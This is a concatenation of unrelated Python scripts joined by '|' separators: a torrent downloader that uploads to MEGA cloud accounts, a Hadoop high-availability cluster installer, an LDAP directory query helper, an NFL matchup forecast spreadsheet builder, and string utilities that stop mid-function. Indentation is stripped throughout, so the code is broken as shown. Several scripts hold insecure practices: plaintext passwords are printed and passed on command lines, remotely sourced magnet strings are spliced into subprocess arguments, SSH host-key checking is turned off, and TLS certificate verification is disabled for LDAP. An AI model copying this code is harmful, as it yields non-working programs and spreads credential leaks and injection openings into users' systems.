uploadedStatus={}
zipFiles=False
finishedDownloadText='finisheddownloadasdfjhli'
def zipdir(path, ziph):
for root, dirs, files in os.walk(path):
for file in files:
ziph.write(os.path.join(root, file))
def getScriptPath():
return os.path.dirname(os.path.realpath(sys.argv[0]))
def clearTemp():
folder=thisdir+'/temp'
shutil.rmtree(folder)
os.makedirs(folder)
def copyAllToTemp(dir):
folder=thisdir+'/temp'
copy_tree("\\\\?\\"+os.getcwd() +dir, folder)
def copyFileToTemp(file):
folder=thisdir+'/temp'
shutil.copyfile("\\\\?\\"+os.getcwd() +file,folder)
def replaceStatusDirectory(parentdir,text):
if os.path.exists(parentdir+'/status'):
for file in os.listdir(parentdir+'/status'):
print file
os.remove(parentdir+'/status/'+file)
else:
os.mkdir(parentdir+'/status')
file = open(parentdir+'/status'+'/'+text, "w")
file.write("")
file.close()
# for dir in os.listdir(thisdir+'/downloads'):
# if dir == hash:
# if os.path.isfile(thisdir+'/downloads/'+hash+'/'+finishedDownloadText):
# os.remove(thisdir+'/downloads/'+hash+'/'+finishedDownloadText)
# for dir in os.listdir(thisdir+'/downloads'):
# if dir in uploadedStatus:
# file = open(thisdir+'/downloads/'+dir+'/'+finishedDownloadText, "w")
# file.write("")
# file.close()
def ensureFolderExists(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def registerDownloadCompleted(hash,username):
folder=thisdir+'/users/'+username
ensureFolderExists(folder)
folder=folder+'/completedDownloads'
ensureFolderExists(folder)
file = open(folder+'/'+hash, "w")
file.write("")
file.close()
def fileAlreadyDownloaded(hash,username):
folder=thisdir+'/'+username+'/completedDownloads'
if os.path.exists(folder):
if hash in os.listdir(folder+'/'+hash):
return True
return False
def strToValidFilename(value):
value=unicode(value, "utf-8")
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\w\s-]', '', value).strip().lower())
re.sub('[-\s]+', '-', value)
value=value.replace(" ","_")
return value
def createTorrentFromMagnet(magnetstr,hash):
print 'adding magnet grsehrtsh'
olddir=os.getcwd()
#os.chdir(delugePath)
#print 'afklwefg '+str(subprocess.check_output(["deluge-console.exe"]))
os.chdir(thisdir)
todl='downloads/'+hash
if not os.path.exists(todl):
print 'making dir '+todl
os.makedirs(todl)
else:
print 'folder already exists, not adding torrent'
return False
#print 'types: '+str(type(delugePath))+' '+str(type(magnetstr))+' '+str(type(hash))
#'"'+delugePath+'/deluge-console.exe" add -p downloads/
#args=shlex.split('"'+delugePath+'/deluge-console.exe" add -p downloads/'+hash+' "'+magnetstr+'"')
args=shlex.split('"'+delugePath+'deluge-console" add -p "'+thisdir+'/downloads/'+hash+'" '+magnetstr)
print '\nadding torrent: '+str(args)
process = Popen(args, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
#addtorrent=str(subprocess.check_output(args))
print '\noutput: '+stdout+'\n'+stderr+'^'
os.chdir(olddir)
return True
def megaUpdateFiles(username,password,hash):
olddir=os.getcwd()
copydir='downloads/'+hash
if fileAlreadyDownloaded(hash,username):
print 'already uploaded this file '+str(os.listdir(copydir))
return
name=completedStatus[hash][0]
finishedTorrenting=completedStatus[hash][1]
print 'creating mega folder for torrent'
args=shlex.split('"'+megatoolsPath+'megamkdir" -u '+username+' -p '+password+' /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash)
print 'args2:'+str(args)
process = Popen(args, stdout=PIPE, stderr=PIPE)
stdout2, stderr2 = process.communicate()
print '\noutput: '+stdout2+'\n'+stderr2+'^'
print 'removing mega folder for status'
args=shlex.split('"'+megatoolsPath+'megarm" -u '+username+' -p '+password+' /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash+'/status')
print 'args2:'+str(args)
process = Popen(args, stdout=PIPE, stderr=PIPE)
stdout2, stderr2 = process.communicate()
print '\noutput: '+stdout2+'\n'+stderr2+'^'
if not finishedTorrenting:
print 'creating mega folder for status'
args=shlex.split('"'+megatoolsPath+'megamkdir" -u '+username+' -p '+password+' /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash+'/status')
print 'args2:'+str(args)
process = Popen(args, stdout=PIPE, stderr=PIPE)
stdout2, stderr2 = process.communicate()
print '\noutput: '+stdout2+'\n'+stderr2+'^'
print stdout2+stderr2
if os.path.exists('downloads/'+hash+'/status'):
print 'adding new status file'
args=shlex.split('"'+megatoolsPath+'megacopy" -u '+username+' -p '+password+' --remote /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash+'/status --local '+'downloads/'+hash+'/status')
print 'args3:'+str(args)
process = Popen(args, stdout=PIPE, stderr=PIPE)
stdout2, stderr2 = process.communicate()
print stdout2+stderr2
print '\noutput: '+stdout2+'\n'+stderr2+'^'
else:
print 'srthiorsiotrsh'
# clearTemp()
# print 'copying to temp'
# for file in os.listdir(copydir):
# if not file=='status':
# if os.path.isfile(copydir+'/'+file):
# print 'copy file '+copydir+'/'+file
# copyFileToTemp(copydir+'/'+file)
# #copyAllToTemp(copydir)
# if os.path.isdir(copydir+'/'+file):
# print 'copy folder '+copydir+'/'+file
# copyAllToTemp(copydir+'/'+file)
# zipf = zipfile.ZipFile('Python.zip', 'w')
# zipdir(copydir, zipf)
# zipf.close()
os.chdir(copydir)
print 'adding the final files'
if not zipFiles:
args=shlex.split('"'+megatoolsPath+'megacopy" -u '+username+' -p '+password+' --remote /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash+' --local .')#"'+copydir+'"')
print 'args3:'+str(args)
process = Popen(args, stdout=PIPE, stderr=PIPE)
stdout2, stderr2 = process.communicate()
#print stdout2+stderr2
print '\noutput: '+stdout2+'\n'+stderr2+'^'
else:
zipname=None
for file in os.listdir('.'):
if not file=='status':
args=shlex.split('"'+zip7Path+'7z" a "'+thisdir+'/temp/'+name+'.zip" "'+file+'"')#"'+copydir+'"')
print 'args3:'+str(args)
process = Popen(args, stdout=PIPE, stderr=PIPE)
stdout2, stderr2 = process.communicate()
print '\noutput: '+stdout2+'\n'+stderr2+'^'
zipname=thisdir+'/temp/'+name+'.zip'
# if os.path.isfile(file):
# print 'adding the final files'
# args=shlex.split('"'+megatoolsPath+'/megaput" -u '+username+' -p '+password+' --path /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash+'/'+file+' "'+copydir+'/'+file+'"')
# print 'args3:'+str(args)
# process = Popen(args, stdout=PIPE, stderr=PIPE)
# stdout2, stderr2 = process.communicate()
# print stdout2+stderr2
# print '\noutput: '+stdout2+'\n'+stderr2+'^'
# if os.path.isdir(file):
# print 'adding the final files'
# args=shlex.split('"'+megatoolsPath+'/megacopy" -u '+username+' -p '+password+' --remote /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash+' --local "'+copydir+'/'+file+'"')
# print 'args3:'+str(args)
# process = Popen(args, stdout=PIPE, stderr=PIPE)
# stdout2, stderr2 = process.communicate()
# print stdout2+stderr2
# print '\noutput: '+stdout2+'\n'+stderr2+'^'
# print 'fileesrthsrthre:'+file
if not zipname==None:
args=shlex.split('"'+megatoolsPath+'megaput" -u '+username+' -p '+password+' --path /Root/TorrentToCloud/'+strToValidFilename(name)+'_'+hash+' "'+zipname+'"')#"'+copydir+'"')
print 'args3:'+str(args)
process = Popen(args, stdout=PIPE, stderr=PIPE)
stdout2, stderr2 = process.communicate()
print '\noutput: '+stdout2+'\n'+stderr2+'^'
os.remove(zipname)
registerDownloadCompleted(hash,username)
os.chdir(olddir)
def processMagnetLink(username,password,magnet):
endhash=magnet.find('&')
if(endhash==-1):
endhash=len(magnet)
hash=magnet[magnet.index(mstart)+len(mstart):endhash]
print 'hash:'+hash
isNew=createTorrentFromMagnet(magnet,hash)
if not isNew:
print 'torrent not new '+str(hash)+str(completedStatus)
if hash in completedStatus:
#add files to mega
print 'mega update files'
megaUpdateFiles(username, password, hash)
def processUser(username,password):
print username+" , "+password
print "thisdir "+thisdir
#os.chdir(delugePath)
#args=shlex.split('"'+delugePath+'deluge-console"')
#print 'args '+str(args)
#print 'afklwefg \n'+str(args)+'\n'+str(subprocess.check_output(args))
#os.chdir(megatoolsPath)
print os.getcwd()
args=shlex.split('"'+megatoolsPath+'megals" -u '+username+' -p '+password+' --reload')
print args
process = Popen(args, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
for s in stderr.split('\n'):
s=s[:-2]
if len(s)>10 and len(s)<1500 and mstart in s:
print 'errpart is:'+s+'^'
print 'extracted magnet:^'+s[s.index("invalid '")+9:]+'^'#'##'+s+'@@\n***********\n'
magnet=s[s.index("invalid '")+9:]
processMagnetLink(username,password,magnet)
megals=stdout#str(subprocess.check_output(args))
print '\ntestfdghsru7456\n'
hasFolder=False
hasMagnetFile=False
for s in megals.split('\n'):
s=s[:-1]
print '$$'+s+'\n^^^^^^^^\n'
if s=='/Root/TorrentToCloud':
hasFolder=True
if s=='Root/TorrentToCloud/magnets.txt':
hasMagnetFile=True
if '/Root/TorrentToCloud' in s:
if 'magnet:?xt=urn:btih:' in s:
magnet=s[len('Root/TorrentToCloud/ '):]
print 'magnet is '+magnet
print 'len'+str(len(magnet))
processMagnetLink(username,password,magnet)
if not hasFolder: #make the folder if it does not exist
args=shlex.split('"'+megatoolsPath+'megamkdir" -u '+username+' -p '+password+' '+'/Root/TorrentToCloud')
print args
megamkdir=str(subprocess.check_output(args))
print megamkdir
# if not hasMagnetFile:
# print os.getcwd()
# print 'thisdir2 '+thisdir
# args=shlex.split('megaput --path /Root/TorrentToCloud/magnets.txt -u '+username+' -p '+password+' "' +thisdir+'/magnets.txt"')
# print 'attempt make magnetstxt'
# megaput=str(subprocess.check_output(args))
# print megaput
# args=shlex.split('megals -u '+username+' -p '+password)
# megals=str(subprocess.check_output(args))
# print megals
# else:
# args=shlex.split('megaget -u '+username+' -p '+password+' /Root/TorrentToCloud/magnets.txt')
# megaget=str(subprocess.check_output(args))
def findHashEnd(astr):
index=0
for c in astr:
if not c.isalnum():
return index
index+=1
return index-1
def updateTorrentStatus():
args=shlex.split('"'+delugePath+'deluge-console" info')
print '\ntorrent info: '+str(args)
process = Popen(args, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
print 'stdout:'+stdout
if len(stdout)<1000 and 'No connection could be made' in stdout:
return
#addtorrent=str(subprocess.check_output(args))
name=''
id=''
size=''
finished=False
parts=stdout.split('\nName: ')
for part in parts:
print '\n$$$$$$$$$$$$\n'+part
if len(part)>50:
endline=part.index('\n')
if '\r\n' in part:
endline=part.index('\r\n')
name=part[:endline]
#print 'name:'+name+'^'
next=part[len(name):]
print 'ni pre:'+next
print 'nextinfo:'+str(next.index('ID: ')+len('ID: '))+'^ '#+str(next.index('\n'))+'^'
next2=next[next.index('ID: ')+len('ID: '):]
id=next2[:findHashEnd(next2)]#next.index('\n')-1]
#print 'id:'+id+'^'
next=next[next.index('Size: '):]
size=next[next.index('Size: ')+len('Size: '):next.index(' Ratio')]
#print 'size:'+size+'^'
sparts=size.split('/')
finished=sparts[0]==sparts[1]
progress='unknown'
if 'Progress: ' in next:
next=next[next.index('Progress: ')+len('Progress: '):]
progress=next[:next.index('[')-1]
#print 'finished: '+str(finished)
tfolder='downloads/'+id
print 'tfolder: '+tfolder
if os.path.exists(tfolder):
print 'replacing status directory '+tfolder+' '+size
replaceStatusDirectory(tfolder,progress)
completedStatus[id]=[name,finished]
#if not part.index('')
#print '\ninfo: '+stdout+'\n'+stderr+'^'
#register this torrent as having been added
print "\n\n*************\n\n"
thisdir=getScriptPath()
Config = ConfigParser.ConfigParser()
Config.read("config.txt")
print Config.sections()
global delugePath
delugePath=Config.get('file','DelugeInstall')
if delugePath==' ' or delugePath=='':
delugePath='';
else:
delugePath+='/'
global megatoolsPath
megatoolsPath=Config.get('file','MegatoolsInstall')
if megatoolsPath==' ' or megatoolsPath=='':
megatoolsPath='';
else:
megatoolsPath+='/'
global interval
interval=Config.getint('other','interval_seconds')
print interval+5
global zipFiles
zipFiles=Config.getboolean('other','zip_files')
print 'zipfiles:'+str(zipFiles)
global zip7Path
zip7Path=Config.get('file','7ZipInstall')
if zip7Path==' ' or zip7Path=='':
zip7Path='';
else:
zip7Path+='/'
print '7zpath: '+zip7Path
ensureFolderExists(thisdir+'/downloads')
ensureFolderExists(thisdir+'/temp')
while True:
start=time.time()
print 'starting check at '+str(start)
updateTorrentStatus()
with open('accounts.csv', 'rb') as f:
reader = csv.reader(f)
count=0
for row in reader:
if count>0:
pass
processUser(row[0],row[1])
count+=1
#registerUploadsCompleted()
print 'waiting for next check'
while time.time()-start < interval:
print str(time.time()-start)+'/'+str(interval)
time.sleep(5)
|
from lxml import etree
import re
import os
import sys
import time
from hadoop.hadoop.node import *
from hadoop.hadoop.nameservice import *
from hadoop.hadoop.hadoopinfo import *
home = os.environ['HOME']
def addProperty(root, name, value):
property = etree.XML('''<property><name>''' + name + '''</name><value>''' + value + '''</value></property>''')
root.append(property)
def modifyProperty(root, name, value):
for property in root:
for elem in property:
if re.match(name, elem.text):
elem.getnext().text = value
def clean(root, pattern):
for property in root:
for elem in property:
if re.match(pattern, elem.text):
root.remove(property)
def initialise():
clean(hdfs_root, "dfs.ha.namenodes*")
clean(hdfs_root, "dfs.namenode.rpc-address*")
clean(hdfs_root, "dfs.namenode.http-address*")
clean(hdfs_root, "dfs.namenode.shared.edits.dir*")
clean(hdfs_root, "dfs.client.failover.proxy.provider*")
clean(hdfs_root, "dfs.ha.fencing.methods*")
clean(hdfs_root, "dfs.ha.fencing.ssh.private-key-files*")
clean(hdfs_root, "dfs.namenode.checkpoint*")
clean(hdfs_root, "dfs.journalnode.edits.dir*")
clean(hdfs_root, "dfs.nameservices*")
clean(hdfs_root, "dfs.ha.automatic-failover.enabled*")
clean(core_root, "ha.zookeeper.quorum*")
et = etree.ElementTree(hdfs_root)
docinfo= hdfs_tree.docinfo
et.write(path + "/conf/hadoop/hdfs-site.xml", pretty_print=True, xml_declaration=True, encoding=docinfo.encoding)
et = etree.ElementTree(core_root)
docinfo= core_tree.docinfo
et.write(path + "/conf/hadoop/core-site.xml", pretty_print=True, xml_declaration=True, encoding=docinfo.encoding)
def setNormalConfiguration(config):
modifyProperty(core_root, "fs.defaultFS", "hdfs://" + config.nameservices[0].namenodes[0].hostname + ":8020")
modifyProperty(hdfs_root, "dfs.namenode.name.dir", "file:" + home +"/hadoop_work/hdfs/namenode")
modifyProperty(hdfs_root, "dfs.datanode.data.dir", "file:" + home +"/hadoop_work/hdfs/datanode")
modifyProperty(yarn_root, "yarn.nodemanager.local-dirs", "file:" + home +"/hadoop_work/yarn/local")
modifyProperty(yarn_root, "yarn.nodemanager.log-dirs", "file:" + home +"/hadoop_work/yarn/log")
modifyProperty(mapred_root, "mapreduce.jobhistory.address", config.jobhistory.hostname + ":10020")
modifyProperty(mapred_root, "mapreduce.jobhistory.webapp.address", config.jobhistory.hostname + ":19888")
modifyProperty(core_root, "hadoop.tmp.dir", "file:" + home +"/tmp")
def setnamenodeHA(config):
addProperty(hdfs_root, "dfs.nameservices", config.getNameservicesname())
for nameservice in config.nameservices:
if nameservice.HAenable:
addProperty(hdfs_root, "dfs.ha.namenodes." + nameservice.name, nameservice.getNamenodesID())
for namenode in nameservice.namenodes:
addProperty(hdfs_root, "dfs.namenode.rpc-address." + nameservice.name + "." + namenode.id,
namenode.hostname + ":8020")
addProperty(hdfs_root, "dfs.namenode.http-address." + nameservice.name + "." + namenode.id,
namenode.hostname + ":50070")
addProperty(hdfs_root, "dfs.namenode.shared.edits.dir", nameservice.getJournalnodesHost())
addProperty(hdfs_root, "dfs.client.failover.proxy.provider." + nameservice.name,
"org.apache.hadoop.hdfs.server.namenode.ha.ConfiguredFailoverProxyProvider")
addProperty(hdfs_root, "dfs.ha.automatic-failover.enabled", "true")
modifyProperty(core_root, "fs.defaultFS", "hdfs://" + nameservice.name)
addProperty(core_root, "ha.zookeeper.quorum", config.getZookeepersHost())
modifyProperty(yarn_root, "yarn.resourcemanager.hostname", config.nameservices[0].resourcemanagers[0].hostname)
addProperty(hdfs_root, "dfs.ha.fencing.methods", "sshfence")
addProperty(hdfs_root, "dfs.journalnode.edits.dir", home + "/hadoop_work/hdfs/journalnode")
addProperty(hdfs_root, "dfs.ha.fencing.ssh.private-key-files", home + "/.ssh/id_rsa")
def writeConfiguration():
et = etree.ElementTree(hdfs_root)
docinfo= hdfs_tree.docinfo
et.write(path + "/conf/hadoop/hdfs-site.xml", pretty_print=True, xml_declaration=True, encoding=docinfo.encoding)
et = etree.ElementTree(core_root)
docinfo= core_tree.docinfo
et.write(path + "/conf/hadoop/core-site.xml", pretty_print=True, xml_declaration=True, encoding=docinfo.encoding)
et = etree.ElementTree(yarn_root)
docinfo= yarn_tree.docinfo
et.write(path + "/conf/hadoop/yarn-site.xml", pretty_print=True, xml_declaration=True, encoding=docinfo.encoding)
et = etree.ElementTree(mapred_root)
docinfo= mapred_tree.docinfo
et.write(path + "/conf/hadoop/mapred-site.xml", pretty_print=True, xml_declaration=True, encoding=docinfo.encoding)
def setConfiguration(config):
setNormalConfiguration(config)
writeConfiguration()
if config.HAenable:
setnamenodeHA(config)
writeConfiguration()
config.writeHosts()
config.writeSlaves()
def startJournalNodes(config):
for nameservice in config.nameservices:
for journalnode in nameservice.journalnodes:
os.system("ssh -o StrictHostKeyChecking=no " + journalnode.ip + " /usr/local/hadoop/sbin/hadoop-daemon.sh start journalnode")
def formatNamenode(config):
# os.system("source /etc/profile.d/jdkenv.sh && source /etc/profile.d/hadoopenv.sh && \
# /usr/local/hadoop/bin/hdfs namenode -format && /usr/local/hadoop/sbin/hadoop-daemon.sh start namenode")
for index_ns, nameservice in enumerate(config.nameservices):
for index_nn, namenode in enumerate(nameservice.namenodes):
if index_ns == 0 and index_nn == 0:
os.system("ssh -o StrictHostKeyChecking=no " + namenode.hostname + " <<DONE\n\
/usr/local/hadoop/bin/hdfs namenode -format\n\
/usr/local/hadoop/sbin/hadoop-daemon.sh start namenode\nDONE\n")
else:
os.system("ssh -o StrictHostKeyChecking=no " + namenode.hostname + " <<DONE\n\
/usr/local/hadoop/bin/hdfs namenode -bootstrapStandby\n\
/usr/local/hadoop/sbin/hadoop-daemon.sh start namenode\nDONE\n")
def setSSHInNN(config, password):
for nameservice in config.nameservices:
for namenode in nameservice.namenodes:
if namenode != config.namenode:
os.system("ssh -o StrictHostKeyChecking=no " + namenode.hostname + " -C '/bin/bash -s' < " + path + "/ssh/sshserver.sh " + password)
for ip in config.allNodesIp:
if namenode.ip != ip:
os.system("ssh -o StrictHostKeyChecking=no " + namenode.hostname + " bash -s < " + path + "/ssh/sshclient.sh " + password + " " + ip)
def setZookeepers(config, password):
os.system("rm " + path + "/conf/zookeeper/zoo.cfg")
os.system("cp " + path + "/conf/zookeeper/zoo_sample.cfg " + path + "/conf/zookeeper/zoo.cfg")
# for zookeeper in config.zookeepers:
for index, zookeeper in enumerate(config.zookeepers):
os.system("echo server." + str(index + 1) + "=" + zookeeper.hostname + ":2888:3888 >> " + path + "/conf/zookeeper/zoo.cfg")
# for nameservice in config.nameservices:
for index, zookeeper in enumerate(config.zookeepers):
os.system(path + "/zookeeper/zookeeper.sh " + password + " " + zookeeper.ip + " " + str(index+1))
def formatZookeeper():
os.system("/usr/local/hadoop/sbin/stop-dfs.sh")
os.system("source /etc/profile.d/jdkenv.sh && source /etc/profile.d/hadoopenv.sh && $HADOOP_PREFIX/bin/hdfs zkfc -formatZK")
if __name__ == "__main__":
config = Configuration(config_root)
initialise()
setConfiguration(config)
argv = sys.argv
if len(sys.argv) != 2:
print 'Usage : Script <password>'
sys.exit(1)
if os.system(path + "/serverpreconfig.sh" + " " + argv[1]) == 0:
os.system("clear")
print "Pre-configuration of Server is done."
else:
print "Pre-configuration of Server failed."
sys.exit(1)
for ip in config.allNodesIp:
if ip != config.namenode.ip:
if os.system(path + "/clientpreconfig.sh" + " " + argv[1] + " " + ip) == 0:
os.system("clear")
print "Pre-configuration of client " + ip + " is done."
else:
print "Pre-configuration of client " + ip + " failed."
sys.exit(1)
if os.system(path + "/hadoop/hadoopmaster.sh" + " " + argv[1] + " " + config.namenode.hostname) == 0:
os.system("clear")
print "Hadoop configuration of Server is done."
else:
print "Hadoop configuration of Server failed."
sys.exit(1)
for (ip, hostname) in config.clients.items():
if os.system(path + "/hadoop/hadoopslave.sh" + " " + argv[1] + " " + ip + " " + hostname) == 0:
os.system("clear")
print "Hadoop configuration of client " + ip + " is done."
else:
print "Hadoop configuration of client " + ip + " failed."
sys.exit(1)
startJournalNodes(config)
formatNamenode(config)
setSSHInNN(config, argv[1])
setZookeepers(config, argv[1])
formatZookeeper()
|
import ldap
import copy
import constants # Local module
def mergeDicts(toDict, fromDict):
#Copy items from 'fromDict' to 'toDict'
if not (isinstance(fromDict, dict) and isinstance(toDict,dict)):
return None
for key in fromDict:
keyCopy = copy.copy(key)
valueCopy = copy.copy(fromDict[key])
toDict[keyCopy] = valueCopy
def getLDAPInfo(searchParamDict):
# Return results of a query on an ldap directory, given queryParameters
# and/or searchFilters eg
# To get users' phone numbers and emails whose
# username is 'konradOno'
# results = getLDAPInfo(
# {
# constants.SEARCH_KEY_WORD:'(uid=*konradOno)',
# constants.SEARCH_FILTERS_KEY:[constants.LDAP_MAIL_KEY,
# constants.LDAP_PHONE_KEY]
# })
#The results with have a meta section and a data section
dataArray = list()
metaDict = dict()
resultsDict = dict()
resultsDict[constants.DATA_KEY] = dataArray
resultsDict[constants.META_KEY] = metaDict
#metaDict[constants.SEARCH_PARAMS_KEY] = None
#metaDict[constants.SEARCH_FILTERS_KEY] = None
metaDict[constants.SUCCESS_STATUS_KEY] = False
searchKeyWord = searchParamDict.get(constants.SEARCH_KEYWORD_KEY)
print(searchParamDict, constants.SEARCH_KEYWORD_KEY)
if hasattr(searchKeyWord, '__iter__'):
searchKeyWord = "&".join(filter(lambda s: s, searchKeyWord))
if not (isinstance(searchParamDict, dict) and searchKeyWord): return resultsDict
print("srPD ", searchParamDict)
# !!! Once you are ready to deploy and have made your certificate signed
# and recognized by the UOFA, set the last argument to True !!
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, False)
uofa_ldapObject = ldap.initialize(constants.UOFA_LDAP_URI)
defaultQueryParams = [constants.LDAP_SURNAME_KEY, constants.LDAP_PHONE_KEY,
constants.LDAP_GIVEN_NAME_KEY, constants.LDAP_UID_KEY]
givenFilters = searchParamDict.get(constants.SEARCH_FILTERS_KEY, defaultQueryParams)
searchFilters = list()
for aFilter in givenFilters:
if ',' in aFilter:
delimitedFilters = aFilter.split(',')
searchFilters += map(lambda s: str(s), filter(lambda a:a, delimitedFilters))
else: searchFilters.append(str(aFilter))
print("searchFs ", searchFilters)
#metaDict[constants.SEARCH_PARAMS_KEY] = searchKeyWord
#metaDict[constants.SEARCH_FILTERS_KEY] = searchFilters
try:
searchResults = uofa_ldapObject.search_s(
constants.UALBERTA_PEOPLE_TREE_SEARCH, ldap.SCOPE_SUBTREE,searchKeyWord,searchFilters
)
except Exception:
#An unhandled exception occured here, implement handling later
print("Exception here")
else:
metaDict[constants.SUCCESS_STATUS_KEY] = True
resultsLen = len(searchResults)
metaDict[constants.COUNT_KEY] = resultsLen
dataArray = map(lambda tup: tup[1], searchResults)
resultsDict[constants.DATA_KEY] = dataArray
return resultsDict
def main():
results = getLDAPInfo(
{
constants.SEARCH_KEYWORD_KEY:'(uid=*klind*)',
constants.SEARCH_FILTERS_KEY : [
constants.LDAP_EMAIL_KEY, constants.LDAP_PHONE_KEY
]
}
)
print(results)
if __name__ == '__main__':
main()
|
import pandas as pd
import matchup
import xlsxwriter
import xlautofit
import xlrd
import sys
import time
import collections
import os
week_timer = time.time()
week_number = 'wc_matrix'
matchups = collections.OrderedDict()
matchups['Matchups'] = [('NE', 'DEN'),
('NE', 'PIT'),
('NE', 'IND'),
('NE', 'CIN'),
('NE', 'BAL'),
('NE', 'SEA'),
('NE', 'GB'),
('NE', 'DAL'),
('NE', 'CAR'),
('NE', 'ARI'),
('NE', 'DET'),
('DEN', 'PIT'),
('DEN', 'IND'),
('DEN', 'CIN'),
('DEN', 'BAL'),
('DEN', 'SEA'),
('DEN', 'GB'),
('DEN', 'DAL'),
('DEN', 'CAR'),
('DEN', 'ARI'),
('DEN', 'DET'),
('PIT', 'IND'),
('PIT', 'CIN'),
('PIT', 'BAL'),
('PIT', 'SEA'),
('PIT', 'GB'),
('PIT', 'DAL'),
('PIT', 'CAR'),
('PIT', 'ARI'),
('PIT', 'DET'),
('IND', 'CIN'),
('IND', 'BAL'),
('IND', 'SEA'),
('IND', 'GB'),
('IND', 'DAL'),
('IND', 'CAR'),
('IND', 'ARI'),
('IND', 'DET'),
('CIN', 'BAL'),
('CIN', 'SEA'),
('CIN', 'GB'),
('CIN', 'DAL'),
('CIN', 'CAR'),
('CIN', 'ARI'),
('CIN', 'DET'),
('BAL', 'SEA'),
('BAL', 'GB'),
('BAL', 'DAL'),
('BAL', 'CAR'),
('BAL', 'ARI'),
('BAL', 'DET'),
('SEA', 'GB'),
('SEA', 'DAL'),
('SEA', 'CAR'),
('SEA', 'ARI'),
('SEA', 'DET'),
('GB', 'DAL'),
('GB', 'CAR'),
('GB', 'ARI'),
('GB', 'DET'),
('DAL', 'CAR'),
('DAL', 'ARI'),
('DAL', 'DET'),
('CAR', 'ARI'),
('CAR', 'DET'),
('ARI', 'DET')]
location = os.getcwd().replace('\\', '/')
output_file = location + '/Weekly Forecasts/Week' + str(week_number) + '.xlsx'
for read_data in range(2):
week_book = xlsxwriter.Workbook(output_file)
header_format = week_book.add_format({'align': 'center', 'bold': True, 'bottom': True})
index_format = week_book.add_format({'align': 'right', 'bold': True})
score_format = week_book.add_format({'num_format': '#0', 'align': 'right'})
percent_format = week_book.add_format({'num_format': '#0%', 'align': 'right'})
if read_data:
colwidths = xlautofit.even_widths_single_index(output_file)
for game_time in matchups:
if read_data:
data_book = xlrd.open_workbook(output_file)
data_sheet = data_book.sheet_by_name(game_time)
sheet = week_book.add_worksheet(game_time)
sheet.write_string(1, 0, 'Chance of Winning', index_format)
sheet.write_string(2, 0, 'Expected Score', index_format)
sheet.write_string(3, 0, '2.5th Percentile Score', index_format)
sheet.write_string(4, 0, '10th Percentile Score', index_format)
sheet.write_string(5, 0, '25th Percentile Score', index_format)
sheet.write_string(6, 0, '50th Percentile Score', index_format)
sheet.write_string(7, 0, '75th Percentile Score', index_format)
sheet.write_string(8, 0, '90th Percentile Score', index_format)
sheet.write_string(9, 0, '97.5th Percentile score', index_format)
sheet.freeze_panes(0, 1)
games = matchups[game_time]
for i in range(len(games)):
home = games[i][0]
away = games[i][1]
homecol = 3 * i + 1
awaycol = 3 * i + 2
sheet.write_string(0, homecol, home, header_format)
sheet.write_string(0, awaycol, away, header_format)
if read_data:
sheet.write_number(1, homecol, data_sheet.cell(1, homecol).value, percent_format)
sheet.write_number(1, awaycol, data_sheet.cell(1, awaycol).value, percent_format)
for rownum in range(2, 10):
sheet.write_number(rownum, homecol, data_sheet.cell(rownum, homecol).value, score_format)
sheet.write_number(rownum, awaycol, data_sheet.cell(rownum, awaycol).value, score_format)
else:
results = matchup.matchup(home, away)
probwin = results['ProbWin']
sheet.write_number(1, homecol, probwin[home], percent_format)
sheet.write_number(1, awaycol, probwin[away], percent_format)
home_dist = results['Scores'][home]
away_dist = results['Scores'][away]
sheet.write_number(2, homecol, home_dist['mean'], score_format)
sheet.write_number(2, awaycol, away_dist['mean'], score_format)
sheet.write_number(3, homecol, home_dist['2.5%'], score_format)
sheet.write_number(3, awaycol, away_dist['2.5%'], score_format)
sheet.write_number(4, homecol, home_dist['10%'], score_format)
sheet.write_number(4, awaycol, away_dist['10%'], score_format)
sheet.write_number(5, homecol, home_dist['25%'], score_format)
sheet.write_number(5, awaycol, away_dist['25%'], score_format)
sheet.write_number(6, homecol, home_dist['50%'], score_format)
sheet.write_number(6, awaycol, away_dist['50%'], score_format)
sheet.write_number(7, homecol, home_dist['75%'], score_format)
sheet.write_number(7, awaycol, away_dist['75%'], score_format)
sheet.write_number(8, homecol, home_dist['90%'], score_format)
sheet.write_number(8, awaycol, away_dist['90%'], score_format)
sheet.write_number(9, homecol, home_dist['97.5%'], score_format)
sheet.write_number(9, awaycol, away_dist['97.5%'], score_format)
if i != len(games) - 1:
sheet.write_string(0, 3 * i + 3, ' ')
if read_data:
for colnum in range(sheet.dim_colmax):
sheet.set_column(colnum, colnum, colwidths[sheet.name][colnum])
week_book.close()
print('Week ' + str(week_number) + ' predictions calculated in ' + str(round((time.time() - week_timer) / 60, 2)) + ' minutes')
|
import random
import string
from six import string_types
from six import text_type
from six import PY3 as python_3
def parse_args(instance, method, ignore_py3=False):
def parser(func):
if ignore_py3 and python_3:
return func
def wrapper(*args, **kwargs):
new_args = []
new_kwargs = {}
# Argumentos Posicionales
for arg in args:
if isinstance(arg, instance):
new_args.append(method(arg))
else:
new_args.append(arg)
# Argumentos Clave
for key, value in kwargs.items():
if isinstance(value, instance):
new_kwargs[key] = method(value)
else:
new_kwargs[key] = value
return func(*new_args, **new_kwargs)
return wrapper
return parser
lower = parse_args(string_types, str.lower)
normalize = parse_args(text_type, lambda txt: txt.encode('utf-8'), True)
def split(string, slen):
if len(string) <= slen:
return [string]
tpart = float(len(string)) / slen
if not tpart.is_integer():
tpart += 1
tpart = int(tpart)
npart = 1
parts = []
ini = 0
end = slen
while npart <= tpart:
if npart == tpart:
parts.append(string[ini:])
else:
parts.append(string[ini:end])
ini += slen
end += slen
npart += 1
return parts
def part(string, parts, mark=''):
if parts <= 0:
return []
elif len(string) <= parts:
return [string]
markl = len(mark)
total_parts = float(len(string) + markl) / parts
if not total_parts.is_integer():
total_parts += 1
total_parts = int(total_parts)
part = 0
init_point = 0
splits = []
while 1:
part += 1
